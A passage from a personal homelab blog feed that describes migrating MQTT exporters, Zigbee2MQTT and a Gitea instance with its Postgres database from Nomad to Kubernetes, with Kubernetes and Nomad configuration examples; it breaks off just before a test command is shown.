</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;promexport&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-mosquitto-user</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.temp }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-pwr</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-temp</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span></code></pre></div><p>I have again cut out some unimportant pieces. Luckily, mqtt2prometheus supports
providing the credentials for MQTT access via environment variables, so I didn&rsquo;t
have to template the entire configuration file to avoid putting the credentials
into git.</p>
<p>Finally, I had to also set up the network policy to allow my Prometheus deployment
access to the Pod and its ports for scraping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;exporters&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">prometheus</span>
</span></span></code></pre></div><h2 id="the-zigbee-manager">The Zigbee manager</h2>
<p>My thermometers are connected via Zigbee, so I needed some way to transform the
data to MQTT and send it to my mosquitto instance. I don&rsquo;t use HomeAssistant,
because it looks very much like overkill. I don&rsquo;t actually control anything,
I just want to gather a bit of data.
I&rsquo;m using <a href="https://www.zigbee2mqtt.io/">Zigbee2MQTT</a> for this. I&rsquo;m using a
Zigbee transceiver connected via LAN, so I didn&rsquo;t have to muck about with
mounting a USB device into the Pod.
Again, zigbee2mqtt is a good piece of software because it allows me to set some
config keys, those containing secrets, via environment variables but also allows
me to provide the non-secret config options in the configuration file.
Zigbee2MQTT requires three secrets:</p>
<ol>
<li>The MQTT credentials for access to mosquitto</li>
<li>An auth token for access to the web UI</li>
<li>A network key</li>
</ol>
<p>I&rsquo;m providing all three from my Vault instance in an ExternalSecret again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_FRONTEND_AUTH_TOKEN</span>: <span style="color:#e6db74">&#34;{{ `{{ .auth }}` }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_MQTT_PASSWORD</span>: <span style="color:#e6db74">&#34;{{ `{{ .mqtt }}` }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_ADVANCED_NETWORK_KEY</span>: <span style="color:#e6db74">&#34;[{{ `{{ .network }}` }}]&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">auth</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/auth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">mqtt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/mqtt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">network</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/network-key</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>The complicated part of the Zigbee2MQTT deployment is the configuration file.
Because sadly, Zigbee2MQTT is one of those applications that need write access
to their configuration file. Which makes usage of a ConfigMap complicated,
because those are always mounted read-only. In the case of Zigbee2MQTT, I don&rsquo;t
really care about the content changes it makes, I can just deploy my original
file over it without an issue. But Zigbee2MQTT won&rsquo;t even start if it can&rsquo;t
write to the config file.</p>
<p>First, the config map itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">configuration.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: 4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    homeassistant:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    permit_join: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    frontend:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      enabled: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      base_topic: zigbee2mqtt
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: &#39;mqtts://{{ .Values.mqttHost }}:443&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: &#34;foobar&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    # Serial settings
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    serial:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      port: &#39;tcp://my-zigbee-bridge:1234&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      adapter: zstack
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    advanced:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      channel: 23
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log_output:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        - console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    devices:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;0x123&#39;:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        friendly_name: &#39;temp/sonoff/thermo1&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        icon: device_icons/bdc2692122548ad0f2b0fb6c9f10a93d.png
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;0x456&#39;:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        friendly_name: &#39;temp/sonoff/thermo2&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        icon: device_icons/bdc2692122548ad0f2b0fb6c9f10a93d.png</span>
</span></span></code></pre></div><p>When new devices are connected, Zigbee2MQTT adds them to the <code>devices:</code> map, and
I then just add them to the ConfigMap manually.</p>
<p>But how to handle the fact that this config file needs to be writable?
Init containers. Because up to now, I&rsquo;ve been living in blissful ignorance of
such hacks, but that streak of good fortune had to end at some point. I just
find it so incredibly ugly. Look at it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/z2m-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:3.21.2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/configuration.yaml&#34;</span>, <span style="color:#e6db74">&#34;/data/configuration.yaml&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">koenkk/zigbee2mqtt:{{ .Values.zigbee2mqttVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/app/data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">web</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.z2m }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">z2m-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span></code></pre></div><p>I&rsquo;m launching an entire other container just to run a single <code>cp</code> command to
copy the mounted ConfigMap into the data volume. I wish we had some better way
to do something like this. But it seems we don&rsquo;t.</p>
<p>And that&rsquo;s it for this one. I think wherever possible, I will keep the future
migration posts in this format, not explaining every single line of every single
Yaml file anymore, but only pointing out interesting things like the issue
with the mosquitto credentials in this one. It&rsquo;s more interesting to write and
I hope more interesting to read than the umpteenth re-explanation of my CNPG
DB setup.</p>
<p>Next up will be my Jellyfin media server. The copying of my media collection
is already done, and hopefully I will get the actual migration completed today.
That one will contain a lot of Grafana plots and Ceph performance musings. &#x1f913;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 16: Migrating Gitea</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-16-gitea/</link>
      <pubDate>Fri, 07 Feb 2025 22:50:37 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-16-gitea/</guid>
      <description>Migrating my Gitea instance from Nomad to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Gitea instance from Nomad to k8s.</p>
<p>This is part 17 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I&rsquo;ve been using <a href="https://about.gitea.com/">Gitea</a> as my Git forge for a while
now. What&rsquo;s now the Gitea instance started life is a <a href="https://github.com/gogs/gogs">Gogs</a>
instance in 2016, when I had to downsize my Homelab to a Raspberry Pi 3B that
couldn&rsquo;t handle all the things I wanted to run on it. I decided to get rid of
my Gitlab instance and exchange it for Gogs. The switch back to Gitea then
happened because Gitlab started eating 12% of my new home server&rsquo;s CPU even
when idle.</p>
<p>This is what the front page looks like when logged in:
<figure>
    <img loading="lazy" src="gitea_frontpage.png"
         alt="A screenshot of the Gitea home page for a logged in user. At the top is a heat map, similar to the one on GitHub&#39;s user profile page. It shows a brighter color for days with a lot of activity, and a lighter color for days with less activity. It shows a full year&#39;s worth of activity, showing one colored box per day, with columns for weeks and rows for days of the week. My activity shows almost all weekend days with activity, while the winter months also show lots of activity on workdays. Below the heat map is an activity feed, showing activities from the last couple of days, like pushes to different repositories. Most of them are to the adm/homelab and mmeier/blog repository. On the right side is a list of repositories, showing ones like &#39;adm/homenet-docs&#39;, &#39;mmeier/smokes.cli&#39; or &#39;learning/learning-go&#39;. Next to some of them is a green check mark or a red cross, indicating the state of the last CI pipeline."/> <figcaption>
            <p>Screenshot of Gitea&rsquo;s home page for my user.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;m quite liking it and, in contrast to Gitlab, I never had any problems with it.
It&rsquo;s pretty snappy (again, especially in contrast to Gitlab) and relatively light
on resources. Most of the time I can&rsquo;t even tell whether it got assigned one
of my beefier x86 nodes or a Raspberry Pi.</p>
<p>I&rsquo;ve got 82 repositories stored in it, from relatively small dead projects which
never got much farther than a README to extremely large repos containing 3D
models and such for a <a href="https://www.sinsofasolarempire1.com/">Sins of a Solar Empire</a>
mod I was once involved in. Most repos don&rsquo;t see a lot of activity and I&rsquo;m the
only user at the moment. The instance is not publicly accessible, but I might
change that when the <a href="https://forgefed.org/">ForgeFed</a> project matures.</p>
<p>My way of working depends on the repository. For my Homelab, this blog and my
Homelab docs for example I&rsquo;m just pushing to the master branch. (Which again
reminds me to finally get around to the <code>main</code> branch migration.)
In my development projects though I&rsquo;m mostly working with Pull Requests. I find
Gitea&rsquo;s interface pretty convenient, and like seeing all the information and
CI runs for a specific feature in one place.</p>
<p>So I&rsquo;m not using too many actual features of Gitea, it&rsquo;s mainly a convenient UI
for my Git repos. But I must admit: I&rsquo;m rather fond of that activity heat map.
The only Gitlab feature I&rsquo;m genuinely missing are the repository stats. If any
of you know a good web app, either dynamic or statically generated, that can
show stats on a Git repo, I&rsquo;d be very interested.</p>
<h2 id="database-setup-and-migration">Database setup and migration</h2>
<p>I promise, this is the last time one of my migration articles will have a
long-winded section on databases. &#x1f609;
But in this case, it&rsquo;s warranted, because this is the first time I&rsquo;m actually
migrating a database, instead of setting up a new one.</p>
<p>I&rsquo;m using <a href="https://cloudnative-pg.io/">CloudNativePG</a> to manage the Postgres
databases in my k8s cluster. More details can be found <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">here</a>.
CNPG has a number of methods for seeding a new DB cluster with data. Generally,
those approaches are split into two. The first way involves another online cluster
and full replication or restoration of a backup.
The second method is more suited to what I needed, namely a one-time import
from another cluster using <code>initdb</code> to bootstrap the CNPG cluster.
This method uses <code>pg_dump</code>/<code>pg_restore</code> from another running cluster. This
method suited me somewhat well, because my Nomad Postgres setup is still up and
running. The docs for this method can be found <a href="https://cloudnative-pg.io/documentation/1.25/database_import/">here</a>.</p>
<p>There was just one problem: In Nomad, I&rsquo;m using <a href="https://developer.hashicorp.com/consul/docs/connect">Consul Connect Service Mesh</a>
to connect services and only allow access between specific services instead of
having open ports everywhere. This has been working pretty nicely in the past
several years. Remember, I&rsquo;m switching away from HashiCorp&rsquo;s stuff not because
their software is bad, but rather for ideological reasons.</p>
<p>But in this instance, I was stumped. For using <code>pg_dump</code>, CNPG needs access
to the other cluster. But of course no k8s service is currently inside the
Consul Mesh, so there&rsquo;s no way to access the Postgres DB. I thought: Well, I
can just open up a node port temporarily. And I failed. As in: I spend an entire
evening trying to figure this out and had to give up. For reference, the
network config for my Postgres Nomad job looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;postgres&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {}
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;script&#34;</span>
</span></span><span style="display:flex;"><span>        command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/pg_isready&#34;</span>
</span></span><span style="display:flex;"><span>        args     <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;-U&#34;, &#34;postgres&#34;</span>]
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        task     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>[...]
</span></span></code></pre></div><p>With that config, Consul launches an <a href="https://www.envoyproxy.io/">Envoy</a> container
next to the Postgres container in the network namespace, by default on a random
port. Inside the network namespace, Postgres&rsquo; <code>5432</code> port is connected to Envoy.
Envoy then listens on a public port, but only lets through connections with the
right mTLS cert. Other services can then be allowed to access Postgres via
their own Envoy proxy. As best as I&rsquo;ve been able to figure out, there&rsquo;s no
way for a service outside the mesh to get through the Envoy proxy to the
Postgres port.</p>
<p>But opening another port also did not work. I&rsquo;m reasonably sure that&rsquo;s because
trying to connect Postgres&rsquo; socket to two other sockets (the temporary public one, and Envoy&rsquo;s)
is just not something that can ever work. I still tried though. Pretty hard
even.</p>
<p>But in the end I threw up my hands and had to admit that I was trying something
that&rsquo;s simply not possible. I could either have that port accessible on the node,
or via the Consul Mesh, but not both.</p>
<p>I also couldn&rsquo;t just temporarily switch off the Consul Mesh for Postgres, because
that would have impacted other workloads on my Nomad cluster. Took me quite a
while to come up with the solution: I remembered that, during my initial migration
to Nomad from my Docker Compose setup, I had set up an <a href="https://developer.hashicorp.com/consul/docs/connect/gateways/ingress-gateway">Ingress Gateway</a>
to provide access to the already migrated services from the apps still running
in Docker Compose.
That Ingress Gateway does pretty much what it says on the tin: It allows services
from outside the mesh access to services inside the mesh. It was of course not
as fine-grained as the service mesh itself. If a service could reach the gateway,
it could access all services inside the mesh that the gateway was allowed to
access.</p>
<p>Luckily, by the time I originally set up the Ingress Gateway, I had already
started to put my Homelab under version control, and I was still able to find
the old Ingress Gateway definition. I pared it down to only Postgres, and the
Nomad job ended up looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;ingress-gateways&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;internal&#34;</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;postgres&#34;</span> {
</span></span><span style="display:flex;"><span>        static <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>        to <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ingress-internal&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8080&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">gateway</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">ingress</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">listener</span> {
</span></span><span style="display:flex;"><span>              port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>              protocol <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;tcp&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>                name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              }
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This definition starts by setting up a bridged network namespace, meaning no
outside access by default. Then it creates a listener for Postgres. With that,
the Envoy proxy of the service would create a socket at port <code>5577</code> in the
namespace, connected to the Postgres service&rsquo;s Envoy proxy. The gateway would
also open a static port on <code>5577</code> on the node it is running on, which would
be connected to port <code>5577</code> inside the network namespace. And with that,
any service connecting to port <code>5577</code> on the host running the Ingress Gateway
would be connected to the Postgres database. Pretty neat and simple setup,
but took me a while to remember.</p>
<p>I ran test connections with this command to confirm that I finally had
external access to the cluster:</p>
